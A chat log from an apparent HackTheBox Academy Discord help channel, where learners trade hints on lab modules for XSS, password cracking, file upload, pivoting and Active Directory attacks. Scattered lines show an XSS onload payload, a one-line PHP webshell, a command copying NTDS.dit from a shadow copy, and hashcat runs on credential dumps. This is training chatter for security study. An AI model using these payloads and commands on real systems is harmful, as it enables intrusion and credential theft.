Q: Try to find a working XSS payload for the Image URL form found at '/phishing' in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit '/phishing/send.php' to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim's login credentials, which you can use to login to '/phishing/login.php' and obtain the flag.

I am just starting thequestion, and I haven't been able to even get going with any code execution. When I try to inject into the url, there are already sinqle quotes which appear in the html. so I have been playing around with the encoding of the url, and there is one bloody single quote at the end of the injection that is there by default. If you know how to get rid of the single quote, or have any nudges in other directions, plz halp.

Encoded injection:
%2Fimages%2Fcat.jpg' onload%3D"alert('THM')%3B"

#

html result with single quote at the end of injection

clever imp
#

I tried to get a little more creative and came up with this, but still not working. Perhaps I have overlooked something FeelsBadMan

gray blade
#

Hello everybody! Someone could help me on AD skill assessment ? Im on the first host MS** with ps remoting but I can just use whoami or hostname, I cant move with cd.. how I can put Nc.exe on this second host?

turbid tartan
#

im going crazy on the password attacks module section mutations the its so slow and its impossible to go through 90k wordlist

proud pine
rustic sage
turbid tartan
gray blade
#

Someone to help me? ^^

tribal plume
frigid vector
# vital adder so you was doing it on the DC right?

Bud are you here?:) I want ask again about Broken authentication skill assessment.

So, now I have ||support.uk:support|||| md5+b64|| cookie. I made a wordlist with ||support.uk(md5)||:roles from ||/CommonAdminBase64.tx|||| md5 encrypted|| ; set up my intruder for ||base64 encode and url main chars||
BUT no one role doesn't fit, what's the problem?

frigid vector
calm void
#

Hey I just signed up and i was clicking on linux fundamentals modile

#

But I can’t unlock it for some reason

lethal atlas
calm void
#

Like when i click unlock nothing happens and the page is zoomed out a little bit

vital adder
calm void
#

From where

vital adder
vital adder
calm void
#

A gf q a

calm void
#

Let me disabled

#

The thing

#

Adblocker

#

Wait

#

It worke now

frigid vector
vital adder
#

same

#

but i would say the password attack is worse

frigid vector
#

but thank you. 1 character i think it is capital S in support...

vital adder
#

wait no i mean the code 🤣

frigid vector
vital adder
#

fast??

#

yeah i think you are the first

#

in some the section if you are doing this when the module first come out and no one where the cred will be in the wordlist it's going to take a good bit to crack

#

and if you are doing something wrong you will just don't know

frigid vector
vital adder
lethal atlas
#

Password attacks was brutal.

#

It was not that hard but sure tested my patience

turbid tartan
#

im stuck on lsass because i cant get pypykatz running

gray blade
vital adder
#

wait

timber hatch
#

ATTACKING WEB APPLICATIONS WITH FFUF, Sub-domain Fuzzing
should I see the subdomain in here, with the command I used?

frigid vector
vital adder
gray blade
#

On MS** (sql_***) to web-win01

vital adder
#

you can just F ing rdp in 🤣

gray blade
#

I can rdp on web-win?

vital adder
#

i didn't so no idea

fringe saffron
#

Hii

gray blade
#

Hum So i need to use web-win to pivot and after I should rdp with kali

primal silo
timber hatch
primal silo
#

oh i remember now

#

i know the answer

#

but find it yourself

timber hatch
#

should i see it?

primal silo
#

wait let me run a quick scan on hackthebox domain

#

i remember the answer and its pretty easy one

#

but let me check if if get it in the scan results or not

west canopy
#

hey @robust mulch can you send me a DM when you have a moment?

timber hatch
#

can i dm you?

primal silo
vital adder
frigid vector
timber hatch
primal silo
# gleaming rivet Try HTTPS instead of HTTP.

bro 🙂 since i knew the answer I straight up searched for it in browser and got redirected to a different site hackthebox.**** so I thought I won't show up in FFUF but it did..

#

well thanks for helping

weak stirrup
#

can someone help me connect via rdp to server for the wireshark module?

#

the instruction tell me We will be sniffing traffic from the host we logged into from our own VM or Pwnbox. Utilizing interface ENS224 in Wireshark

#

i dont have that interface. i thought the VPN was one of the tunnels (tun1 or tun0)

acoustic owl
weak stirrup
#

ok so i am using remmina i don thave xfreerdp installed

#

i am connect already to that machine but i still dont see this EN224 interface in wireshark when i run it on my local box

#

the remina interface has displayed a desktop that is "weird"

#

the first time i tried to connect it asked me for Mr beans password to allow 'color'

acoustic owl
weak stirrup
#

so i reset the link and now i get a all black screen with no controlls that i can see

#

right click does not bring up a menu to get a terminal

acoustic owl
#

Log in with RDP (Remmina) on the specified host.
Then start Wireshark there.

weak stirrup
#

ok so i figured out how to start wireshark by clicking on 'activities' but the resolution is only 644x480 so i cant use wireshark

#

how do i fix the resolution on the rdp hosted computer

acoustic owl
weak stirrup
#

none of those suggestions fixed the problem. i am using a parrot os (HTB edition). i am unable to install xfreerdp2-x11 due to package version backward comparability issues (according to apt-get with the freerdp-client package) and remmina is not allowing me to dynamically change the resolution or manual set it before i connect. any other ideas?

rustic sage
#

I'm stuck at the Broken Authentication Assessment (https://academy.hackthebox.com/module/80/section/848). I registered an account and looked at the session cookie. I put it in cyberchef and out comes a MD5 hash which returns the username of the current logged in user. Then I just have to find the right user right? I did this by brute forcing the username in the message sending site ("User not found" ...), out comes the user "guest" is available. But when I make the MD5 hash of guest and put it to base64 it just won't accept the cookie and won't work. Then I tried to brute force the password using rockyou.txt and filtered the right passwords out, but no success. Please help me prayge

acoustic owl
acoustic owl
rustic sage
#

ohhhhhhhhhh

rustic sage
acoustic owl
glossy sparrow
#

hey guys! I'm beginner here in the field of cybersecurity. It's my dream to become an ethical hacker and join the cybersecurity and i've join this server to learn all the stuffs about cybersecurity and ethical hacking from the basic. Right now, I'm searching for someone who is experienced ethical hacker and can teach me or guide me towards ethical hacking from the first step. Is anybody there to help me?

vital adder
# glossy sparrow hey guys! I'm beginner here in the field of cybersecurity. It's my dream to beco...

nope but if you are new give both of these video a check https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=4JZjj_H4ei4

Introductory video on getting into hacking and cybersecurity.

▶ Play video

Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2023-edition/
Academy: https://academy.tcm-sec.com

Timestamps:
0:00 - Introduction
0:41 - Intigriti Sponsorship
2:01 - Important Notes
4:12 - Building a Foundation
5:14 - Basic IT Skills
8:22 - Networking Skills
12:35 - Linux Skills
15:07 ...

▶ Play video
deft escarp
#

I need help with the IPMI section of the foorinting module. I have to get a password in cleartext. I got the has but I can't seem to brute force the password with hashcat, crackstation, or metasploits default list. not too sure where I'm going wrong

acoustic owl
weak stirrup
#

still having trouble with this wire shark lesson i am in the proper computer and on wire shark now.. but i only ever see a file called flag.jpeg which is not the correct file the hint suggest i should see other incorrect files like water.jpg htb.jpg that i never see. the picture i get back is that of a dog and seems to have nothing to do with transformers (for which i assume is a reference to the child's cartoon and not a electric grid component ) either. am i just failing to understand the program?

fathom pendant
deft escarp
#

Ty!

rustic sage
#

no admin panel for the ||support|| account either

vital adder
#

hint because that user isn't an admin user

rustic sage
#

thank you then I go back to username fuzzing

sleek urchin
#

hello guys, I am doing File Upload Attacks: Whitelist Filters, and there is two techniques to use, I have used both of the techniques, and generated the successful payloads through Burp:Intruder, and after sending and testing all the payloads through Burg:Repeater, I get "File successfully uploaded", but after opening/examining any shell through browser or curl, I get 404 not found error.

#

but I noticed in all the the payloads there is "/" or "" as a special character, so I URL encoded them, and try to open them, but still 404 error appears, any help will be appreciated

#

the other special character is back slash

stable wolf
weak stirrup
#

still only get the dog but i was able to use the traffic to answer the other question about the user name so i know i am not doing everything wrong.

stable wolf
thorn urchin
weak stirrup
stable wolf
sleek urchin
thorn urchin
#

modules are rarely rarely actually broken. But I dont think Ive done the one yall talking bout so idk.

weak stirrup
thorn urchin
weak stirrup
#

i assume i am fitlering it out somehow

#

but because i can get the user name and see the dog... i am nto so sure.

sleek urchin
weak stirrup
#

i do not think i am filtering anything out at this point in time and still only see the flag.jpeg file that contains the dog.

torn blade
#

how do i make firefox not change a \ to a / in the url

weak stirrup
#

i think that is that code liek %20 for space but for the backslash

torn blade
#

gotcha, ill figure it out, thank yiu

analog tendon
#

is anyone else getting traceback errors when running pypykatz.py? redownloading it and ran the install but no matter which module im trying to run it gives this error

#

Traceback (most recent call last):
File "/home/h0gbyte/Tools/pypykatz/pypykatz/pypykatz.py", line 12, in <module>
from pypykatz.commons.common import KatzSystemInfo
File "/home/h0gbyte/Tools/pypykatz/pypykatz/pypykatz.py", line 12, in <module>
from pypykatz.commons.common import KatzSystemInfo
ModuleNotFoundError: No module named 'pypykatz.commons'; 'pypykatz' is not a package

#

or better question. would anyone know if it would hurt the file if i removed this line

#

nvm commenting the line out doesnt change anything

analog tendon
#

has anyone found a way around this. i reinstalled again from github and its showing different lines as the problem

dim hound
#

How to get the 'academy user' role?

analog tendon
analog tendon
dim hound
#

I am in my account.. but I don't see such token 😅 I have seen in on my HTB account tho

analog tendon
#

are you paying for the academy?

dim hound
#

I am

analog tendon
#

weird. for me it shows up above OPT devices

#

OTP*

dim hound
#

aww wait, I have stopped the payment

analog tendon
#

ahhh. there you go

dim hound
#

I have completed the CBBH path, that's why

#

Thanks for the help anyway ; )

analog tendon
#

np. would you happen to know anything regarding my issue by chance?

dim hound
#

Nope😅 But I do know haha ; )

analog tendon
#

alrighty np. it is weird. i cant tell if its an issue with the tool or with my machines libraries

#

ill just come back to that section

dim hound
#

Which section are you doing?

analog tendon
dim hound
#

That's weird.. which tool do you try to use

analog tendon
#

the lsa minidump

dim hound
#

CPTS path, I think

#

I only did CBBH mate 😁

analog tendon
#

yes it is

#

its all good. i put out a community help thing maybe someone has run into the issue

dim hound
#

Wait, I can try it for you on my Ubuntu vm

dim hound
analog tendon
dim hound
analog tendon
#

what error are you getting?

dim hound
analog tendon
#

yup i was getting that one too

dim hound
#

Hmm sorry man, I can't solve this one in a few mins

#

idk how HTB tells you to install/use it

analog tendon
#

its all good. ive been trying to figure it out for a while

turbid tartan
#

oh i had this earlier today

#

same pypykatz problem

#

hold on i search for the message

analog tendon
#

it doesnt say anything about installing. just talks about the tool. and the use is for an lsass dump file. so it would run as pypykatz lsa minidump <lsadumpfile> to run it

turbid tartan
#

Make a new instance
pip3 install --upgrade pyopenssl==22.1.0
pip3 install pypykatz
pip3 install --upgrade minikerberos==0.3.5

#

if you use pwnbox

analog tendon
#

im using kali. but that still may work

turbid tartan
#

it worked for me

analog tendon
#

holy shit. i think that worked

turbid tartan
#

but i have to say the password attack module is kinda pain

#

i know i had the same reaction

analog tendon
#

it did. dude thank you so much. yea it seems minikerberos i had was 0.4.0 and pyopenssl just wasnt there

fathom pendant
#

Mood

#

But yeah also some tools require an older version of python

#

Python2.7

analog tendon
#

i see. damn shouldn't have upgraded kali then. although there was a certain tool in an earlier module that required postgresql 15 and i had 14. pretty much screwed myself getting those changed out. so thats why i upgraded

#

well then i will actually put that in the community help for anyone else having the same issue. thanks guys

fathom pendant
#

I think you can install specific versions

subtle glen
#

footprinting, medium lab, i found ||alex's|| credencials, i used ||remmina|| to login to the windows machine, i found ||important.txt|| im trying to use it as the ||Administrator password|| but it doesnt work, it says "the username or password is incorrect" may i please have some help?

acoustic owl
subtle glen
distant tinsel
#

How do I connect to the vm to capture data with wireshark in page 5 of AD enumeration and attacks the host it gives me to rdp into is a Linux box that can’t capture with wireshark

visual quail
#

Working on the last question on the hashcat module in academy. The HTLM question. It always comes back as exhausted. I tried it with some of hashcat's built in rules but got the same result. what am I missing?
the command that I am running is clear

#

sudo hashcat -a0 -m27100 DC01.inlanefreight.local.ntds rockyou.txt

tribal plume
vital adder
#

the hashs isn't NetNTLMv2

visual quail
#

I also tried it with -m1000

#

same result

vital adder
#

with rockyou?

visual quail
#

yes

subtle glen
vital adder
# visual quail yes

i just give it a try and after 20 sec of running hashcat with rockyou it's cracked like almost 500 password

true belfry
#

I need some help with the Broken Authentication skills assessment.. I have the support usernames (6 total), decoded the cookie (not the persistence one, no idea about that). Can't seem to get any passwords from rockyou.txt to work.. My grep filters down to 14 possibilities and they all fail.

red obsidianBOT
thorn urchin
#

also #rules and #welcome this channel is for discussing modules, not a generic help channel

warm sand
#

Hello everyone, doing the attacking enterprise networks - lateral movement, and I did escalate with the ilfserveradm user to Administrator but still cannot get the flag from the admin desktop? Anyone available to get me some help with it or tell me if I am doing something wrong/missing something? Thank you

thorny wadi
fathom pendant
#

what is the module and section; what exactly is giving you an issue, can you give an example of what you have tried (avoiding spoilers ofc); not everyone feels like just clicking the link to see what it's about

#

I love looking up the forum posts from the hackthebox academy stuff and finding @acoustic owl just in there somewhere in the thread xD

thorny wadi
fathom pendant
#

just ask your question here unless you really can't ask the question without it being a spoiler?

acoustic owl
fathom pendant
thorny wadi
#

oh ok :D, support is already helping, ty! 😄

thorny wadi
#

or am I mistaking you from somebody else xD ?

visual quail
fathom pendant
#

hmm

#

i don't think m1000 is the right mode to unhash that file extension

#

even still there's an x2john that can be used

turbid tartan
#

1000 is ntlm

fathom pendant
void gate
true belfry
visual quail
# fathom pendant hmm

I got it! turned out that my command was correct. I would start it and then walk away from the computer and come back and it would say exhausted and I would go back to the drawing board. If I would have scrolled up I would have seen all the passwords that it cracked. the rest of the question was easy after that. Thanks for the help though!

fathom pendant
#

Ah yeah it was unhashing the entire thing it sounds like

#

Instead of just the one you needed

visual quail
#

yep

woven copper
#

Hey did you find a way to fix it ?

fathom pendant
visual quail
#

That would have been a more efficient way to do it for sure.

rustic sage
#

yup

warm sand
#

Is somebody available to help me get he double pivot working to MGMT01 on Attacking Enterprise Networks module (post-exploitation section)? The handler on my host doesn't catch the DC01 payload even if everything is set up just fine... thank you!!

scenic walrus
#

Hello, I am on the NFS chapter in teh footprinting module. The first step is to cat /etc/exports/ The problem is that my computer does not have that file. Any thoughts on something I missed?

scenic walrus
#

figured it out. needed to install nfs kernel.

harsh mason
#

@iron basin Did you get a nudge on your Login Brute-Force question? I'm stuck on the last two questions. I understand it as, since you now have an employee (cant say I do), stalk them, cupp a wordlist, brute ssh, get flag, then lateral locally to another employee and their flag. Thoughts?

#

@iron basin Tried -C combined, tried -P for pw list with -l for various users gained in module. Banner grab revealed a listening service so I exhausted those attempts. Tried -L and -P with many wordlists each but keep running out of time. I feel like I missed an "employee" name somewhere.

raven cairn
#

On attacking common services easy could i have some help getting my shell to work?

#

i am able to write files in mysql. I also see info about the xampp/xxxxx directory.

#

this section is making me bang my head

fathom pendant
#

mood

#

yeah the webshell was a bitch

#

i don't recall exactly how I got it to work

#

I just remembered googling a bit then making it work with the ?c= <command>

acoustic owl
raven cairn
#

I can't access the webshell on the site

#

and I can't get a meterpreter session

fathom pendant
#

remember xampp is Windows

raven cairn
#

i know

#

made sure not to write the linux shell

fathom pendant
#

because that is a whole other mood xD

#

but are you uploading a webshell or rev shell?

#

because you said meterpreter

acoustic owl
raven cairn
#

let me show some screenshots of my process. I am not good at explaining

fathom pendant
#

we know :^)

raven cairn
#

|| I realize i didn't specify port 8000 in screenshot, but even if i do meterpreter session wont happen ||

acoustic owl
#

Try it with
|| "<?php echo shell_exec($_GET['cmd']);?>" ||

raven cairn
#

how did you have the intuition to know this

acoustic owl
#

If you are not sure if you are in the right place and your PHP is running, you can also write a PHP Info File

<?php phpinfo();?>

acoustic owl
proud pine
unique ridge
#

Can I get any hints for this question?

crisp thunder
#

I am new and i am wondering were to start?

red obsidianBOT
pearl sail
#

anyone can help with Attacking SQL Databases .., please DM me

rustic sage
#

hey

rustic sage
rustic sage
rustic sage
#

Hi guys I am stuck on this question does not find the user to verify the login error. the question is as follows.
Which user account on the domain controller has many event identifier login errors (4625) generated in rapid succession, which is indicative of a password brute force attack? Flag is the name of the user account.

#

i don´t understand

rustic sage
#

Hi guys, noob here - want to get into pentesting, found this channel. My name is Nick, happy to be here, nice to meet you all!

red obsidianBOT
novel matrix
#

@rustic sage ^

rustic sage
#

Thx ++

ashen wolf
#

Password attacks

Medium Lab

logged in as user j**** what to do now

north ermine
#

Greetings !

I have an issue on question 1 WINDOWS PRIVILEGE ESCALATION : Further Credential Theft

#

find the sql01 passwd

#

I've used all tools available but can"t find any trace of it. Can someone give me a hint ? 🙂

opaque niche
ashen wolf
opaque niche
#

and then look for information

north ermine
trim thorn
#

Hi all I am stuck and confused in the getting started (Web enumeration question "Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag. ")
I scanned with nmap and get the login page, and scanned with gobuster and I got the wordpress is in setup mode.
The hint says "Everything you need to login is given to you"
I tried admin admin and admin password in the login page no success.
If I hit continue in the setup page nothing happen.
What am I missing?! I really need to understand here if I should be able to solve this exercise just using what has been explained in the Web enumeration page, or there is more to do.
I am not looking for a solution but I really need to understand how I need to approach to this course.
Thank you so much for any help

trim thorn
#

Sorry I solved it and it was super easy, this is confirming me that the assessment in the session is related to what has been explained to the session itself, good to know, now I can keep going more relaxed

autumn pilot
#

nope, it is useful when and how to use them

subtle glen
#

footprinting, hard lab, i found the ||imap|| creds and logged on, i have no clue how to find the ||ssh key|| i selected the ||important|| folder and i need help with the commands, how do i view all messages? ||1 search all doesnt return anything an any folder except inbox, but its not the ssh key||

shadow canopy
#

Attacking Enterprise Networks
i found the creds but "monitoring.inlanefreight.local" redirects back to "login.php" after authentication
doesn't go to the next page

opaque niche
#

Any tips for brute forcing Johanna's password? In the password attacks lab hard (I am using crackmapexe with winrm option)

rustic sage
#

anyone available for help on the last hop of the pivoting skill assessment (via dm)?

sick warren
#

ActivwDirectory assesment
I used the webshell to get an RCE but I can't find credentials to access the machine .. I tried to look for connection string or credentials on the web.config file and found nothing .. also when I try to run powerUp script I get no response. can anyone tell me what should I do or give me a hint?

rustic sage
opaque niche
rustic sage
rustic sage
tight mesa
#

So I'm working on the web proxies module in the repeater section. I got the flag, but it's saying its wrong. What I did was send the request to repeater, then ls. flag.txt popped up so i cat flag.txt & got a flag. The hint is saying its not in the same directory, but I didn't have to traverse any directories. What am I doing wrong?

opaque niche
tight mesa
#

wait I now see it says OTHER flag

sly tapir
#

Password Attacks/Attacking AD: I am trying to copy this NTDS.dit file, but it keeps saying that it cannot find the filepath....am I doing something wrong here cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

opaque niche
sly tapir
tight mesa
#

My burp suite has stopped forwarding requests. It is stuck on the loading page. Any suggestions?

#

I get : "error: failed to connect to <ip address>

fathom bone
#

Someone here who finished Attack SMB and can give me hint?

low zephyr
#

What is the answer for this

#

İ am really new at these things 😁

glass pecan
#

make sure u delete any space

low zephyr
#

There isnt any

#

Anyone can help ?

glass pecan
#

can someone give a hint for password attack - pass the hash, I am in the last question where we need to connect to julio DC01, I send a reverse shell, it works but I dont get any session, anyone knows why? I used pwnbox and my own machine

glass pecan
low zephyr
#

Intractive sections

glass pecan
#

did u use that as the answer ?

#

i did like 100x times

#

I even use different ports

#

wont work

low zephyr
#

Can anyone help please 😭

glass pecan
acoustic owl
glass pecan
#

the S

fathom bone
#

@acoustic owl can you give me a hint for attacking smb, got stuck on the last question and can`t get the id_rsa, when trying to authenticate through smb

fathom bone
#

Attacking common services

glass pecan
#

@acoustic owl can you also give me a hint on Password attack- pass the hash last question, I cant receive a reverse shell from julio DC01

glass pecan
low zephyr
#

Ok thanks to everyone 🙏

acoustic owl
acoustic owl
fathom bone
#

i know but im forced to use only pubkey authentication and got permission denied, also tried to force password authentication with -o but doesnt work

acoustic owl
glass pecan
#

no the extra one

#

the one before

#

Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

tight mesa
#

I did, that didn’t work

#

It’s still not working

acoustic owl
acoustic owl
glass pecan
#

when I use nc, listening for the connection

#

the command executes but I can establish the connection

#

cant*

#

I been using different ports and trying different listeners provided by revshells.com

acoustic owl
tight mesa
rustic sage
#

Hi guys I am stuck on this question does not find the user to verify the login error. the question is as follows.
Which user account on the domain controller has many event identifier login errors (4625) generated in rapid succession, which is indicative of a password brute force attack? Flag is the name of the user account.

#

Help me!

thorny wadi
#

Is it normal for Get-DomainObjectACL to take ages ? ._.

unique ridge
valid sinew
#

Hey Guys

Have a problem where i cant copy and paste commands from my local machine into the VM instance. I can do it the other way around from the VM instance to my machine but not from my machine onto the VM instance

Any ideas how to fix this as it is so annoying.

Many Thanks

Kapz

rustic sage
#

@ introducción comand linea Windows

unique ridge
opaque niche
#

I'm still stuck on performing brute force on johanna, any hint? #password attacks lab hard

rustic sage
#

@unique ridge Wait a minute and I'll tell you how because I don't remember

valid sinew
#

I am not on Kali Linux

acoustic owl
acoustic owl
rustic sage
#

I have found the login error but I don't know how to apply it to the user to whom the error is addressed

valid sinew
#

As this is the VM that is in the web interface

#

It is a Parrot box and my machine is a windows machine

#

So annoying i dont know how to send a picture through here

inland moon
#

Hello Team,

Can anyone give me a good resource to learn thick client pentesting

acoustic owl
valid sinew
valid sinew
rustic sage
#

did anyone finish Password Attack Lab - Hard?

valid sinew
#

Ok this is weird on another discord channel i can upload pictures but for hack the box i dont have the option to upload pictures. How do i get the right to upload pictures? 😦

#

It says useapps and that is it

#

Does not have upload option

#

Seems like a permission issue to me

#

I tried 3 different browsers as well as my mobile and i get the same problem

#

Is there an admin or someone i can reach out to about this

rustic sage
#

for the Password Attack Lab - Hard, How do I move the Logins.kdbx into the local attack machine? it says permission is denied

opaque niche
#

Linux or windows?

#

the thing goes through the B...

arctic sentinel
rustic sage
arctic sentinel
#

Anyone working in the bash scripting module?!?! I`ve been stuck for a whole in the Flow Control-Loops section 😦 😦 😦

#

Or anyone with knowledge in bash scripting??

arctic sentinel
woeful ermine
#

which module is that?

rustic sage
slender kelp
#

Stuck on the module footprinting - imap/pop3. The task is to access "the emails", but I can only find one and there's no flag in it

woeful ermine
woeful ermine
#

check google and/or discord

slender kelp
#

oh. I'll do some digging on disc then. thanks

woeful ermine
#

people shared some links for IMAP commands check those

spring grove
#

Hi, I'm going through the vulnerability assessment and have reached the "Getting Started with Nessus" section. I'm having trouble downloading Nessus onto my kali VM. I've selected the latest version of Nessus and the Linux - Debian - amd64 download. But when I try to the .deb file it fails. Any tips on getting this to work?

slender kelp
fathom pendant
#

.deb is the file extension for debian based packages; it's not an installer itself

fathom pendant
hollow bramble
#

In the ICMP Tunneling with SOCKS section of the Pivoting, Tunneling, and Port Forwarding module, I get this message when trying to run ptunnel on the pivot machine:

[sudo] password for ubuntu: 
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.36' not found (required by ./ptunnel-ng)
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./ptunnel-ng)

From what I understand it's because my Kali VM is more up to date than the pivot target but I can't compile it on the target either as it doesn't have autoreconf... I'd like to avoid having to compile it on my Kali VM with an older version of gcc as I'm very not pro at it

fathom pendant
#

ptunnel is not working due to an update; just use a different tunneling technique I wasn't able to find a reliable source to fix that issue

#

but all the tunneling flags can be found regardless of which technique used :)

hollow bramble
fathom pendant
#

I was unable to find a reliable way to get ptunnel-ng to work

flat oxide
#

guys I literally finished Attacking Common Applications I just left the third question on Skills Assessment II: "What is the FQDN of the third vhost? " can anyone help me?

hollow bramble
fathom pendant
fathom pendant
halcyon sigil
#

This tmux question is total senseless ... WTF

hollow bramble
flat oxide
fathom pendant
#

have you tried diging ?

flat oxide
#

yes I have tried with this command: "dig ns ||monitoring.inlanefreight.htb|| @10.129.201.90"

#

and also dig axfr ||monitoring.inlanefreight.htb|| @10.129.225.125

fathom pendant
#

is there a reason you're digging the subdomain and not the main domain?

flat oxide
#

I also tried: "dig axfr inlanefreight.htb @10.129.225.125"

#

but still get: ";; Connection to 10.129.225.125#53(10.129.225.125) for inlanefreight.htb failed: connection refused."

fathom pendant
#

is that the spawned IP?

flat oxide
#

yes

spring grove
#

I can download other .deb packages fine. It seems like Nessus is the only one I'm having issues with.

modest isle
#

Windows Fundamental is actually cool too!

Really fun learning Windows in the process.

crude vessel
#

Hello friends, can you help me with a problem?, I'm trying to hack johanna's password using mut_password but I'm not having good results, any ideas? or any hint of how johanna's password begins? this is in the Password attacks Hard lab module

fathom pendant
#

Try a different list that may rock your world

spring grove
crude vessel
simple zephyr
#

Anyone in here working on escape today?